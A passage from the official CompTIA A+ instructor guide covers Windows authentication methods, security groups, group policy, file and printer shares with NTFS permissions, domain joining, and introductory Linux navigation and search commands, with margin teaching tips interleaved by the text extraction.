option in the User Accounts applet. Lowering the notification level will make the
system more vulnerable to malware, however.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 481
Show
Slide(s)
Authentication
Methods
Teaching
Tip
Explain that MFA
requires a subject to
present two separate
credentials that use
different factors,
such as a smart card
(hardware token) plus
a password or PIN.
2-step verification
is typically required
Configuring UAC notifications. (Screenshot courtesy of Microsoft.) when a new client
device is used to
sign in to a website
Note that the default “Administrator” user account is not subject to UAC and so should or web service.
The user registers
be left disabled if the computer is to be used securely.
an email account
or phone number
with the service. On
authenticating with a
password, the service
then sends a soft
Authentication Methods token code via the
registered contact
In an access control system, accounts are configured with permissions to access method. Alternatively,
resources and (for privileged accounts) rights to change the system configuration. the contact method
To access an account, the user must authenticate by supplying the correct may just be used to
credentials, proving that he or she is the valid account holder. inform the user that a
new device has been
The validity of the whole access control system depends on the credentials for used to access the
an account being usable by the account holder only. The format of a credential is service. The potential
called an authentication factor. The principal factors are categorized as knowledge for this token to be
(something you know, such as a password), possession (something you have, such intercepted or for the
contact method to be
as a smart card or smartphone), and inherence (something you are, such as a compromised is what
fingerprint). makes these methods
2-step verification
Multifactor Authentication rather than 2FA.
Note the use of
Using a single factor makes authentication less reliable. A password could be an authenticator
shared, a device token could be stolen, or a facial recognition system could be application to turn
spoofed using a photograph. a smartphone into
a second factor and
An authentication technology is considered strong if it is multifactor. Multifactor the form factors that
authentication (MFA) means that the user must submit at least two different kinds hardware tokens can
of credential. There are several standard multifactor technologies. take.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
482 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
2-step Verification
2-step verification is a means of using a soft token to check that a sign-in request
is authentic. It works on the following lines:
1. The user registers a trusted contact method with the app. This could be an
email account or phone number, for instance.
3. If the app detects a new device or that the user is signing on from a different
location or is just configured by policy to require 2-step verification in all
instances, it generates a soft token and sends this to a registered email
account or phone number. The code could be delivered by email, short
message service (SMS) text, or as an automated voice call.
4. The user must then input the soft token code within a given time frame to be
granted access.
Authenticator Application
An authenticator application, such as Microsoft Authenticator (microsoft.com/en-
us/security/mobile-authenticator-app), can be used for passwordless access or used
as a two-factor authentication (2FA) mechanism. This works as follows:
1. The authenticator app is installed to a trusted device that is under the
sole control of the user, such as a smartphone. The smartphone must be
protected by its own authentication system, such as a screen lock opened via
a fingerprint.
2. The service or network that the user needs to authenticate with is registered
with the authenticator app, typically by scanning a quick response (QR)
code and then completing some validation checks. Registration uses
encryption keys to establish a trust relationship between the service and the
authenticator app.
3. When the user tries to sign in, the service or network generates a prompt on
the authenticator. The user must unlock his or her device to authorize the
sign-in request.
4. The authenticator then either displays a soft token for the user to input or
directly communicates to the service or network that the user supplied their
credential.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 483
Windows Hello
The Windows Hello subsystem allows the user to configure an alternative means
of authenticating. Depending on hardware support, the following options are
available:
• Personal identification number (PIN)—Unlike a normal Microsoft account
password, a Windows Hello PIN is separately configured for each device. It
uses the trusted platform module (TPM) feature of the CPU or chipset and
encryption to ensure that the PIN does not have to be stored on the device itself.
This is designed to prevent the sort of sniffing and interception attacks that
ordinary passwords are subject to. Despite the name, a PIN can contain letters
and symbols.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
484 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Configuring Windows Hello sign-in options. This PC has the PIN method set up, but it does not
have a fingerprint reader or a camera with infrared (IR) to produce a facial template that will be
resistant to spoofing. (Screenshot courtesy of Microsoft.)
A PIN must be configured to set up Windows Hello. The PIN acts as backup mechanism
in case other methods become available. For example, a camera may fail to work and
make facial recognition impossible, or a hardware token might be lost or temporarily
unavailable.
• Facial recognition—This bio gesture uses a webcam to scan the unique features
of the user’s face. The camera records a 3-D image using its infrared (IR) sensor
to mitigate attempts to use a photo to spoof the authentication mechanism.
• Security key—This uses a removable USB token or smart card. It can also use a
trusted smartphone with an NFC sensor.
From these descriptions, it might seem like only one factor is used, but there are two.
The second factor is an encryption key stored in the TPM.
Single Sign-On
Single sign-on (SSO) means that a user authenticates once to a device or network
to gain access to multiple applications or services. The Kerberos authentication
and authorization model for Active Directory domain networks implements SSO. A
user who has authenticated with Windows is also authenticated with the Windows
domain’s SQL Server and Exchange Server services. Another example is signing in
to Windows with a Microsoft account and also being signed in to cloud applications
such as OneDrive and Office365.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 485
The advantage of SSO is that each user does not have to manage multiple digital
identities and passwords. The disadvantage is that compromising the account also
compromises multiple services. The use of passwords in SSO systems has proven
extremely vulnerable to attacks.
The Windows Hello for Business mechanism seeks to mitigate these risks by
transitioning to passwordless SSO. In general terms, this works as follows:
1. The user device is registered on the network. This uses public/private
encryption key pair. The private key is only stored within the TPM of the user
device and never transmitted over the network or known by the user. The
public key is registered on the server.
2. When the user authenticates to the device via Windows Hello, the device
communicates a secret encrypted by its private key to the network
authentication server.
3. The server uses the public key to decrypt the secret. This proves that the
secret really did come from the device as it could only have been encrypted
by the private key. Therefore, the network server can authenticate the user
account and issue it with an authorization token to use network services and
applications.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
486 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Security Groups
A domain supports the use of security groups to assign permissions more easily
and robustly. User accounts are given membership of a security groups to assign
them permissions on the network. These permissions apply to any computer joined
to the domain. For example, members of the Domain Admins security group can
sign in on any computer in the domain, including DCs. A member of the Domain
Users security group can only sign in on certain workstations and has no rights to
sign in on a DC.
Remember that accounts and security groups in a domain are configured in the Active
Directory database stored on a Domain Controller, not on each PC. The Active Directory
Users and Computers management console is used to create and modify AD accounts.
Organizational Units
An organizational unit (OU) is a way of dividing a domain up into different
Show administrative realms. You might create OUs to delegate responsibility for
Slide(s) administering company departments or locations. For example, a “Sales”
department manager could be delegated control with rights to add and delete
Group Policy and
Login Scripts user accounts and assign them to a Sales security group, but no rights to change
account policies, such as requiring complex passwords. Standard users in the Sales
Teaching OU could be given permission to sign in on computers in the Sales OU, but not on
Tip computers in other OUs.
Explain that group
policies can be used
to configure security
Group Policy and Login Scripts
options and Windows/
A domain group policy configures computer settings and user profile settings.
app settings for
multiple user and Some settings are exposed through standard objects and folders, such as Security
computer accounts in Settings. Other settings are exposed by installing an Administrative Template.
the domain. GPOs can Administrative Templates can be used to define settings in third-party software too.
be targeted to OUs. Group policy can also be used to deploy software automatically.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 487
Unlike a local computer, domain group policy objects (GPOs) can be applied to
multiple user accounts and computers. This is done by linking a GPO to a domain or
OU object in AD. For example, you could attach Sales GPOs to the Sales OU and the
policies configured in those GPOs would apply to every user and computer account
placed in the Sales OU. A domain or OU can be linked to multiple GPOs. A system of
inheritance determines the resultant set of policies (RSoPs) that apply to a particular
computer or user account.
Login Scripts
A login script performs some type of configuration or process activity when the
user signs in. A login script can be defined via the user profile or assigned to an
account via group policy. A login script can be used to configure the environment
for the user—setting environmental variables, mapping drives to specific
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
488 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Most of these tasks can be implemented via GPO. Some companies prefer to use login
scripts, and some prefer GPO.
Configuring iOS device enrollment in Microsoft’s Intune Enterprise Mobility Management (EMM)
suite. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 489
Review Activity:
Windows Security Settings
7
1. While you are assigning privileges to the accounting department in your Teaching
organization, Cindy, a human resource administrative assistant, insists Tip
that she needs access to the employee records database so that she can Take some time at
fulfill change of address requests from employees. After checking with the end of each topic
her manager and referring to the organization’s access control security to answer questions.
You can use the
policy, you discover that Cindy’s job role does not fall into the authorized
review questions
category for access to that database. What security concept are you for discussion in
practicing in this scenario? class or set them for
students to complete
The principle of least privilege. individually during or
after class.
2. Which three principal user security groups are created when Windows is
installed?
Users, Administrators, and Guests. You might also include Power Users, though
use of this group is deprecated. Going beyond the account types listed in the exam
objectives, you might include groups such as Remote Desktop Users, Remote
Management Users, or Backup Operators. There are also system groups, such as
Everyone, but users cannot be assigned manually to these.
3. What tool would you use to add a user to a local security group?
You can change the account type between Standard and Administrator via Control
Panel, but the Local Users and Groups management console is the tool to use for a
custom security group. You could also use the net localgroup command.
The computer must have a fingerprint reader and a trusted platform module (TPM).
Windows Hello must first be configured with a personal identification number (PIN)
as a backup method.
True.
gpupdate is used to refresh local policy settings with updates or changes from the
policy template. gpresult is used to identify the Resultant Set of Policies (RSoP) for a
given computer and/or user account.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
490 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
7. Angel brought in the new tablet he just purchased and tried to connect
to the corporate network. He knows the SSID of the wireless network
and the password used to access the wireless network. He was denied
access, and a warning message was displayed that he must contact the
IT Department immediately. What happened, and why did he receive the
message?
Mobile device management (MDM) is being used to mediate network access. The
device must be enrolled with the MDM software before it can join the network.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 491
Topic 14D
Manage Windows Shares Show
Slide(s)
Manage Windows
8
Shares
CORE 2 EXAM OBJECTIVES COVERED
1.2 Given a scenario, use the appropriate Microsoft command-line tool. Teaching
1.6 Given a scenario, configure Microsoft Windows networking features on a client/desktop. Tip
2.1 Summarize various security measures and their purposes. This topic covers
2.5 Given a scenario, manage and configure basic security settings in the Microsoft Windows examples from several
OS. objectives to cover
joining a domain,
One of the main uses of networks is for file- and printer-sharing. As a CompTIA A+ configuring shares
and permissions, and
technician, you will often need to configure network shares. It is important that you
home folders/login
configure the correct permissions on shares, understanding how share and NTFS scripts.
permissions interact.
Workgroup Setup
As well as user management, the network model determines how shared resources Show
are administered. A workgroup is a peer-to-peer network model in which Slide(s)
computers can share resources, but management of each resource is performed on
Workgroup Setup
the individual computers. A domain is based on a client/server model that groups
computers together for security and to centralize administration. Some computers Teaching
are designated as servers that host resources, while others are designated as clients Tip
that access resources. Administration of the servers and clients is centralized. Explain that in a
workgroup, any
Joining a Workgroup computer can be
used as a server to
Windows setup automatically configures membership of the default workgroup, host shared printers
named WORKGROUP. Each computer is identified in the network browser by a and folders. On a
hostname. The hostname can be changed using the System Properties dialog domain, these roles
(sysdm.cpl). are dedicated to
computers configured
as servers.
The workgroup name can be changed via System Properties, but it is entirely cosmetic. It
is almost always left set to WORKGROUP.
It is possible to enable discovery and sharing on public networks, but this will apply to
all public networks and so is not recommended.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
492 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Sharing options are configured via the Advanced sharing settings applet in
Control Panel. To share files on the network, Turn on network discovery and Turn
on file and printer sharing must both be selected.
Under All networks, you can select Turn off password-protected sharing to allow
anyone to access file shares configured on the local computer without entering any
credentials. This works by enabling the Guest user account for network access only.
For password-protected sharing, network users must have an account configured on the
local machine. This is one of the drawbacks of workgroups compared to domains. Either
you configure accounts for all users on all machines and manage passwords on each
machine manually, use a single shared account for network access (again, configured
on all machines), or you disable security entirely.
Windows also supports nearby sharing. This refers to sharing data between a PC and
smartphone or other device over Bluetooth in a personal area network (PAN). This is a
simple way to exchange files between devices. Files are saved to the user’s Downloads
folder.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 493
To share a specific folder, right-click it and select Give access to. Select an account,
and then set the Permission level to Read or Read/write as appropriate.
Everyone is a special system group that contains all user accounts. This system group is
often used to configure shares.
The Share tab in the folder’s Properties dialog can be used to customize
permissions, change the share name, and limit the number of simultaneous
connections. Windows desktop versions are limited to 20 inbound connections.
In addition to any local shares created by a user, Windows automatically creates
hidden administrative shares. These include the root folder of any local drives (C$)
and the system folder (ADMIN$). Administrative shares can only be accessed by
members of the local Administrators group.
Note that if you disable password-protected sharing, the administrative shares remain
password-protected.
In fact, if you add a $ sign at the end of a local share name, it will be hidden from
general browsing too. It can still be accessed via the command-line or by mapping a
drive to the share name.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
494 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Viewing devices in a workgroup network. The COMPTIA and COMPTIA-LABS hosts are both
enabled for file sharing. The LaserJet 200 printer listed here is connected directly to the network.
(Screenshot courtesy of Microsoft.)
Mapped Drives
A mapped drive is a share that has been assigned to a drive letter on a client
device. To map a share as a drive, right-click it and select Map Network Drive.
Select a drive letter and keep Reconnect at sign-in checked unless you want to
map the drive temporarily. The drive will now show up under This PC. To remove a
mapped drive, right-click it and select Disconnect.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 495
net view
• View the shares available on server named MYSERVER:
Teaching
Printer Sharing Tip
Many print devices come with an integrated Ethernet and/or Wi-Fi adapter. This This is also covered in
means that they can communicate directly on the network. Such a printer can be Core 1, so you can skip
it here. If you haven’t
installed using the Add Printer wizard (from Devices and Printers). Just enter the IP done Core 1 already,
address or hostname of the printer to connect to it. Each computer on the network briefly distinguish
can connect to this type of printer independently. connecting a client to
a print device directly
Any printer object set up on a Windows host can also be shared so that other versus connecting
network users can access it. This means that the printer can only be accessed to the printer object
when the Windows machine is on. Print jobs and permissions are managed via the shared by a Windows
Windows host. PC.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
496 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
A printer is shared on the network via the Sharing tab in its Printer Properties
dialog. Check Share this printer and enter a descriptive name. Optionally, use the
Additional drivers button to make drivers available for different client operating
systems. For example, if the print server is Windows 10 64-bit, you can make 32-bit
Windows 7 drivers available for other client devices.
To connect to a shared printer, open the server object from Network and the
printer will be listed. Right-click it and select Connect.
Connecting to a printer shared via the COMPTIA PC. Note that this is the same LaserJet 200 print
device as shown earlier, but it is being connected to as a shared device rather than mapped
directly. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 497
Configuring NTFS permissions via the Security tab for a folder. (Screenshot courtesy of Microsoft.)
The Security tab shows the ACL applied to the file or folder. Each access control
entry (ACE) assigns a set of permissions to a principal. A principal can either be a
user account or a security group. The simple permissions are as follows:
• Read/list/execute permissions allows principals to open and browse files and
folders and to run executable files.
• Write allows the principal to create files and subfolders and to append data to
files.
• Modify allows the principal write permission plus the ability to change existing
file data and delete files and folders.
• Full control allows all the other permissions plus the ability to change
permissions and change the owner of the file or folder.
Each permission can be configured as either allow or deny. Each object has
an implicit deny that prevents a principal from using a permission it has not
been assigned. Explicit deny permissions are used to achieve more complex
configurations.
A user may obtain multiple permissions from membership of different groups or
by having permissions allocated directly to his or her account. Windows analyzes
the permissions obtained from different accounts to determine the effective
permissions. In this process, it is important to understand that an explicit deny
overrides anything else (in most cases).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
498 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Putting explicit deny permissions to one side, the user obtains the most effective
allow permissions obtained from any source. For example, if membership of a
“Sales” group gives the user Read permission and membership of a “Managers”
group gives the user Modify permission, the user’s effective permission is
Modify.
If a user attempts to view or save a file with insufficient permissions to do so, Windows
displays an Access Denied error message. The Advanced interface includes a tool that
can be used to evaluate effective permissions for a given principal.
Permissions Inheritance
Show When folders are secured using NTFS and/or share permissions, the matter of
Slide(s) inheritance needs to be considered.
Permissions The first consideration is that NTFS permissions assigned to a folder are
Inheritance automatically inherited by the files and subfolders created under the folder.
This default inheritance behavior can be disabled via Security > Advanced >
Permission tab, however.
The second consideration is the combination of share and NTFS permissions. The
permissions design needs to account for the following factors:
• Share permissions only protect the resource when it is accessed across the
network; NTFS permissions apply locally and across the network.
• Share permissions are set at the root of the share and all files and subdirectories
inherit the same permissions.
• If both share and NTFS permissions are applied to the same resource, the
most restrictive applies when the file or folder is accessed over the network.
For example, if the group “Everyone” has Read permission to a share and the
“Users” group is given Modify permission through NTFS permissions, the
effective permissions for a member of the “Users” group will be Read.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 499
Disk partitions using the FAT32 file system can only be protected using share
permissions.
As the interaction between these permissions is quite complex, most of the time,
the shared folder permission is set to Full Control for either the Everyone or
Authenticated Users default groups. The effective permissions are managed using
NTFS security.
Domain Setup
When a computer is joined to a domain rather than a workgroup, it is put under the Show
control of the domain administrators. To communicate on a domain, the computer Slide(s)
must have its own account in the domain. This is separate from any user accounts Domain Setup
that are allowed to sign-in.
Teaching
The Windows Home edition cannot join a domain. Tip
Explain how a
Windows PC is set up
in either workgroup
or domain mode and
how users sign in to
the domain rather
than using a local PC
account.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
500 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Windows does not support joining the computer to a domain during an attended
installation. The computer can be joined during an unattended installation by using
an answer file or script. Otherwise, you use either the Access work or school
option in the Account settings app or the System Properties (sysdm.cpl) dialog
to join a domain. The computer must be on the domain network and configured by
DHCP with an appropriate IP address and DNS servers. Each domain is identified
by a FQDN, such as ad.company.example, and the local computer must be
able to resolve this name via DNS to join. The credentials of an account with domain
admin privileges must be input to authorize the new computer account.
The same interfaces can be used to detach the computer and revert to workgroup
use. This requires a user account that is a member of the local Administrators
group.
To use services in the domain, the user must sign in to the PC using a domain
account. The Other user option in the sign-in screen will provide a domain option
if it is not the default. You can also enter a username in the format Domain\
Username to specify a domain login.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 501
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
502 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
When the user signs in, the home folder appears under This PC with the allocated drive letter:
(Screenshot courtesy of Microsoft.)
When the user signs in, the home folder appears under This PC with the allocated
drive letter:
Using the home folder location to save a file. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 503
Using GPO to redirect the Download folder for accounts in a Nonadmins OU to a shared folder on
a network file server. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
504 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Windows Shares
9
The user does not have “Write” or “Modify” permission to that folder. If there is
no configuration issue, you should advise the user about the storage locations
permitted for user-generated files. If there were a configuration issue, you would
investigate why the user had not been granted the correct permissions for the
target folder.
The share is hidden from the file browser. It can be accessed by typing a UNC. The
default administrative shares are all configured as hidden.
4. When you set NTFS permissions on a folder, what happens to the files
and subfolders by default?
5. If a user obtains Read permissions from a share and Deny Write from
NTFS permissions, can the user view files in the folder over the network?
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 505
Lesson 14
Summary
7
You should be able to manage and troubleshoot Windows network settings, Show
configure users and share permissions in workgroup environments, and summarize Slide(s)
Active Directory/domain concepts. Summary
• Use setup and monitoring checklists and tools to ensure proper configuration
of local OS firewall settings, including public versus private network types and
application restrictions and exceptions.
• Use the principle of least privilege to configure user accounts within security
groups with the minimum required permissions. Ensure that UAC is enabled to
mitigate risks from misuse of administrator privileges.
• Consider replacing password-based local login and SSO authentication with MFA
and/or passwordless authentication and sign-in verification, using email, hard
token, soft token, SMS, voice call, and authenticator applications.
• Make training and education resources available to users to help them use File
Explorer navigation and select appropriate network paths for accessing file
shares, printers, mapped drives, and home folders.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 15
Managing Linux and macOS
1
LESSON INTRODUCTION
So far in this course, you worked mostly with the Microsoft Windows operating Show
system. A CompTIA A+ technician should be capable of supporting diverse OS Slide(s)
environments. The various operating systems you might encounter use different Objectives
interfaces and command syntax, but the functionality of those tools is common
across all types of systems. You will need to configure disks and file systems, user Teaching
accounts, network settings, and software applications. Tip
This lesson steps fully
away from Windows
Lesson Objectives to cover basic
administration and
In this lesson, you will: support procedures
for Linux and macOS.
• Identify features of Linux.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
508 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 15A
Show
Slide(s)
Identify Features of
Linux
Teaching
Tip
There are lots of
Identify Features of Linux
commands to get
2
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 509
Desktop Environments
Linux distros designed for use as client PCs typically load a graphical desktop
environment at startup. The graphical environment is driven by an open-source
version of the X Window Display system called Xorg (or just X). Various desktop
programs can be launched within X. Examples include Gnome (GNU Object Model
Environment), KDE (K Desktop Environment), Cinammon, and Xfce.
GNU is a recursive acronym standing for “GNU is Not UNIX.” Many of the non-kernel bits
of software developed under the open-source GNU license to replace their proprietary
UNIX equivalents can be used with Linux.
Ubuntu 20 running the GNOME desktop with a virtual terminal window open to run commands
in the Bash command environment.
Within a desktop environment, you can open a terminal emulator to use the default
command shell (or an alternative shell if needed). The terminal emulator runs
within a window on the desktop. The terminal emulator connects to the shell via a
pseudoterminal (pty/pts) interface.
Console Switching
When a graphical environment is installed, the X server occupies one of several
virtual tty consoles, typically tty1. The CTRL+ALT+Fx keys can be used to switch
between consoles. Each console can support a different login prompt and shell.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
510 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Command Interface
Show Linux commands are entered in a standard format:
Slide(s)
• The first “word” input is interpreted as the command. This could be a full or
Command Interface relative path to the executable or just the name of an executable stored in a
directory identified by a PATH environment variable. The command word is
Teaching
completed by the first space character.
Tip
Optionally, identify • Options (switches) are used to change the operation of a command. An option
other features of the can be a single letter (preceded by a single hyphen) or a word (preceded by a
terminal emulator double hyphen). The order in which the options are placed on the command is
environment,
including tab
not important.
completion and
keyboard shortcuts for
• Arguments are values supplied to the command for it to operate on, such as file
scrolling. names. Arguments must be supplied in the correct order for the command’s
syntax.
You might want
to note that some
You can send or redirect the results of one command to another command using a
commands use
two words: apt, for pipe. The pipe symbol is a vertical bar ( | ), which you type between two commands.
instance. You can issue more than one command on a single line by placing a semicolon
( ; ) between the commands. When you press ENTER, the commands execute
sequentially.
Case Sensitivity
Commands, parameters, and file and directory names are all case sensitive in Linux.
For example, ls -l file.data and ls -L File.data would produce
completely different results. Using capitals in the command name would generate
an error message.
Help System
A Linux command reports its function and syntax when executed with the --help
option. The help is often several pages long so it common to pipe the output to
the more command. more shows the results a page at a time. For example: ls
--help | more
Alternatively, you can use man to view the help pages for a particular command.
For example, use man man to view the help pages for the man command!
Also note that terminal emulators typically support TAB completion to help in
entering commands. Use the UP and DOWN arrow keys to scroll through command
history. In some terminals, you can use SHIFT+PAGEUP or SHIFT+PAGEDOWN and
CTRL+SHIFT+UPARROW or CTRL+SHIFT+DOWNARROW to scroll through output.
File Editors
Most Linux files use a plain text format and can easily be edited directly. There are
numerous text file editors. The Nano text editor is a basic example often preferred
by those coming from a Windows environment. To open or create a file, use nano
filepath or nano -l filepath to show line numbers. You can use the cursor
keys to move around the text. Editor and file operations are completed using CTRL+
key shortcuts. For example, CTRL+O writes changes to the file and CTRL+X quits the
editor.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 511
Many administrators prefer to use vi or vim. These tools have two modes.
Command mode is used for file operations, such as writing changes and closing the
editor. To enter text, you need to switch to insert mode by pressing an appropriate
command key. For example, i switches to insert mode at the current cursor
position, a appends text after the current cursor position, A appends text at the
end of the current line, and o inserts text on a new line below the current line. The
ESC key switches from insert mode back to command mode.
To show line numbers, in command mode, enter :set number. To save a file,
use :w from command mode. To save and quit, use :wq. Alternatively, :q! quits
without saving.
Navigation Commands
Everything available to Linux is represented as a file in a unified file system. For Show
example, the first fixed disk would normally be represented in the file system by / Slide(s)
dev/sda. A second storage device—perhaps one attached to a USB port—would Navigation Commands
be represented as /dev/sdb.
Teaching
When Linux boots, a system kernel and virtual file system are loaded to a RAM
Tip
drive. The unified file system identifies the location of the persistent root partition
from the appropriate storage device and loads the file system stored on the disk. It’s not a content
example, so don’t
Unlike Windows, Linux does not use drive letters like C: or D:. The unified file system go into too much
starts at the root, represented by /. Directories and subdirectories can be created detail, but explain the
from the root to store files. Linux’s file system hierarchy standard (FHS) specifies main organizational
principles of FHS (root,
how the directories under root should be named and where types of files should be home directories, and
placed. For example, the /home directory contains subdirectories for each user to separate areas for
store personal data and the /etc directory contains configuration files. configuration files,
shared files, log files,
and executables).
Viewing the root directory and file system hierarchy standard (FHS) subdirectories in Ubuntu Linux.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
512 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The core commands that you should know to navigate the Linux file system include
pwd, cd, ls, and cat.
pwd Command
pwd “prints” the working directory, though “printing” will typically mean “display
on the terminal,” unless stdout is redirected. The working directory is important
because any commands you use which don’t specify a path as an argument will
default to the working directory. The prompt on some distros will show your current
working directory or the tilde (~), which indicates you are in your home directory.
cd Command
cd is used to change the working directory. Typical syntax would be:
• Change directory to /etc. This is an absolute path from root (begins with /) so
will work regardless of your current directory:
cd /etc
• Change your directory to a subdirectory called documents. This is a relative
path. The documents directory must exist below the current directory:
cd documents
• Change your directory to the parent directory of the one you are currently
working in:
cd ..
ls Command
ls lists the contents of a directory, in a similar way to dir at the Windows
command prompt. Popular parameters include -l to display a detailed (long) list
and -a to display all files including hidden or system files. The following example
shows the entire contents of the /etc directory in a detailed format:
ls -la /etc
cat Command
cat returns the contents of the files listed as arguments. The -n switch adds line
numbers to the output. Often, cat output is piped to a pager (cat | more or
cat | less) to control scrolling. You can also redirect the output to another file.
In Linux, there are overwrite and append redirection operators:
• Overwrite any data at the destination file:
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 513
Search Commands
Linux supports very fast and accurate file system search commands. Show
Slide(s)
find Command Search Commands
The find command is used to search for files. The basic syntax is find path
Teaching
expression, where path is the directory in which to start the search and Tip
expression is the data to match. An option is used to determine what the
expression should search on, such as -name, -size, -user (owner), or -perm You won’t be able to
spend much time on it
(permissions). The -type option locates classes of files, but where Windows file in class, but encourage
types are defined by extensions, in Linux, type distinguishes files, directories, block students to do further
devices (disks), network sockets, symbolic links, and named pipes. reading and seek
practice on use of
grep Command regular expressions.
The grep (Globally search a Regular Expression and Print) command is used to
search and filter the contents of files. Its output prints (displays) the lines that
contain a match for the search string. The search string can be a simple text
value to match (a literal) or can use a pattern-matching language called regular
expressions (regex).
grep is especially useful for searching long files such as system logs. For example,
the following command displays only the lines in the Linux system log file for
messages that contain the text uid=1003, ignoring the case of the text with the
-i switch:
grep -i “uid=1003” /var/log/messages
The grep command can also be used as a file name search tool by piping a
directory list as input. For example, ls -l | grep audit command returns
a long listing of any files in the current directory whose name contains audit.
You can pipe the output of many other commands to grep to apply different types
of filters.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
514 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
cp /etc/hosts /tmp
• Copy all files beginning with the name message from the /var/log
directory into /home/david. The -v option displays the files copied:
cp -v /var/log/message* /home/david
mv Command
The mv command is used to either move files from one directory to another or
rename a file. For example:
• Move the file data.txt from the /home/david directory to the /tmp
directory, keeping the file name the same:
mv /home/david/data.txt /tmp
